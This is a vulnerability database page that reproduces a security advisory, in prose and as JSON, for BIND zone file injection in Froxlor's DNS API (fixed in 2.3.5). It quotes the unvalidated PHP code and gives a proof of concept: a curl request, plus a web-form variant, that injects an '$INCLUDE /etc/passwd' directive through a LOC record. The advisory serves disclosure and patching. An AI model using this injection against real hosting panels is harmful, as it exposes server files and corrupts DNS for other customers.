GHSA-X6W6-2XWP-3JH6

Vulnerability from github – Published: 2026-03-24 16:49 – Updated: 2026-03-30 13:50
VLAI?
Summary
Froxlor is vulnerable to BIND zone file injection via unsanitized DNS record content in DomainZones API
Details

Summary

The DomainZones.add API endpoint (accessible to customers with DNS enabled) does not validate the content field for several DNS record types (LOC, RP, SSHFP, TLSA). An attacker can inject newlines and BIND zone file directives (e.g. $INCLUDE) into the zone file that gets written to disk when the DNS rebuild cron job runs.

Affected Code

lib/Froxlor/Api/Commands/DomainZones.php, lines 213-214, 253-254, 290-291, 292-293:

} elseif ($type == 'LOC' && !empty($content)) {
    $content = $content; // no validation
} ...
} elseif ($type == 'RP' && !empty($content)) {
    $content = $content; // no validation
} ...
} elseif ($type == 'SSHFP' && !empty($content)) {
    $content = $content; // no validation
} elseif ($type == 'TLSA' && !empty($content)) {
    $content = $content; // no validation
}

There is even a TODO comment at line 148 acknowledging this gap:

// TODO regex validate content for invalid characters

The content is then written directly into the BIND zone file via DnsEntry::__toString() (line 83 of lib/Froxlor/Dns/DnsEntry.php):

return $this->record . "\t" . $this->ttl . "\t" . $this->class . "\t" . $this->type . "\t" ... . $_content . PHP_EOL;

And the zone file is written to disk in lib/Froxlor/Cron/Dns/Bind.php line 121:

fwrite($zonefile_handler, $zoneContent . $subzones);

PoC

As a customer with DNS management enabled and an API key, add a LOC record with injected BIND directives:

curl -s -u "API_KEY:API_SECRET" \
  -H 'Content-Type: application/json' \
  -d '{"command":"DomainZones.add","params":{"domainname":"example.com","type":"LOC","content":"0 0 0 N 0 0 0 E 0\n$INCLUDE /etc/passwd"}}' \
  https://panel.example.com/api.php

Alternatively via the web UI, intercept the DNS editor form POST and set dns_content to 0 0 0 N 0 0 0 E 0\n$INCLUDE /etc/passwd and dns_type to LOC.

After the DNS rebuild cron runs, the resulting zone file at {bindconf_directory}/domains/example.com.zone will contain:

@   18000   IN  LOC 0 0 0 N 0 0 0 E 0
$INCLUDE /etc/passwd

BIND will process the $INCLUDE directive and attempt to parse /etc/passwd as zone data. While most lines will fail to parse as valid records, the file content is readable by the BIND process (running as bind/named user), confirming file existence and potentially leaking parseable lines as DNS records.

Impact

  1. Information Disclosure: The $INCLUDE directive lets a customer read world-readable files on the server through the DNS subsystem. The zone content (including included files) is visible to the customer via the DomainZones.get API call or the DNS editor in the web UI.

  2. DNS Service Disruption: Malformed zone content can cause BIND to fail to load the zone, causing DNS outage for the affected domain. Injecting $GENERATE directives could create massive record sets for amplification attacks.

  3. Zone Data Manipulation: Arbitrary DNS records can be injected by breaking out of the current record line with newlines, allowing the customer to create records that were not intended.

Severity ?
8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.6 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.3.4"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "froxlor/froxlor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30932"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-24T16:49:21Z",
    "nvd_published_at": "2026-03-24T19:16:51Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `DomainZones.add` API endpoint (accessible to customers with DNS enabled) does not validate the `content` field for several DNS record types (LOC, RP, SSHFP, TLSA). An attacker can inject newlines and BIND zone file directives (e.g. `$INCLUDE`) into the zone file that gets written to disk when the DNS rebuild cron job runs.\n\n## Affected Code\n\n`lib/Froxlor/Api/Commands/DomainZones.php`, lines 213-214, 253-254, 290-291, 292-293:\n\n```php\n} elseif ($type == \u0027LOC\u0027 \u0026\u0026 !empty($content)) {\n    $content = $content; // no validation\n} ...\n} elseif ($type == \u0027RP\u0027 \u0026\u0026 !empty($content)) {\n    $content = $content; // no validation\n} ...\n} elseif ($type == \u0027SSHFP\u0027 \u0026\u0026 !empty($content)) {\n    $content = $content; // no validation\n} elseif ($type == \u0027TLSA\u0027 \u0026\u0026 !empty($content)) {\n    $content = $content; // no validation\n}\n```\n\nThere is even a TODO comment at line 148 acknowledging this gap:\n```php\n// TODO regex validate content for invalid characters\n```\n\nThe content is then written directly into the BIND zone file via `DnsEntry::__toString()` (line 83 of `lib/Froxlor/Dns/DnsEntry.php`):\n\n```php\nreturn $this-\u003erecord . \"\\t\" . $this-\u003ettl . \"\\t\" . $this-\u003eclass . \"\\t\" . $this-\u003etype . \"\\t\" ... . $_content . PHP_EOL;\n```\n\nAnd the zone file is written to disk in `lib/Froxlor/Cron/Dns/Bind.php` line 121:\n\n```php\nfwrite($zonefile_handler, $zoneContent . $subzones);\n```\n\n## PoC\n\nAs a customer with DNS management enabled and an API key, add a LOC record with injected BIND directives:\n\n```bash\ncurl -s -u \"API_KEY:API_SECRET\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"command\":\"DomainZones.add\",\"params\":{\"domainname\":\"example.com\",\"type\":\"LOC\",\"content\":\"0 0 0 N 0 0 0 E 0\\n$INCLUDE /etc/passwd\"}}\u0027 \\\n  https://panel.example.com/api.php\n```\n\nAlternatively via the web UI, intercept the DNS editor form POST and set `dns_content` to `0 0 0 N 0 0 0 E 0\\n$INCLUDE /etc/passwd` and `dns_type` to `LOC`.\n\nAfter the DNS rebuild cron runs, the resulting zone file at `{bindconf_directory}/domains/example.com.zone` will contain:\n\n```\n@\t18000\tIN\tLOC\t0 0 0 N 0 0 0 E 0\n$INCLUDE /etc/passwd\n```\n\nBIND will process the `$INCLUDE` directive and attempt to parse `/etc/passwd` as zone data. While most lines will fail to parse as valid records, the file content is readable by the BIND process (running as `bind`/`named` user), confirming file existence and potentially leaking parseable lines as DNS records.\n\n## Impact\n\n1. **Information Disclosure**: The `$INCLUDE` directive lets a customer read world-readable files on the server through the DNS subsystem. The zone content (including included files) is visible to the customer via the `DomainZones.get` API call or the DNS editor in the web UI.\n\n2. **DNS Service Disruption**: Malformed zone content can cause BIND to fail to load the zone, causing DNS outage for the affected domain. Injecting `$GENERATE` directives could create massive record sets for amplification attacks.\n\n3. **Zone Data Manipulation**: Arbitrary DNS records can be injected by breaking out of the current record line with newlines, allowing the customer to create records that were not intended.",
  "id": "GHSA-x6w6-2xwp-3jh6",
  "modified": "2026-03-30T13:50:46Z",
  "published": "2026-03-24T16:49:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/security/advisories/GHSA-x6w6-2xwp-3jh6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30932"
    },
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/commit/b34829262dc32818b37f6a1eabb426d0b277a86b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/froxlor/froxlor"
    },
    {
      "type": "WEB",
      "url": "https://github.com/froxlor/froxlor/releases/tag/2.3.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Froxlor is vulnerable to BIND zone file injection via unsanitized DNS record content in DomainZones API"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.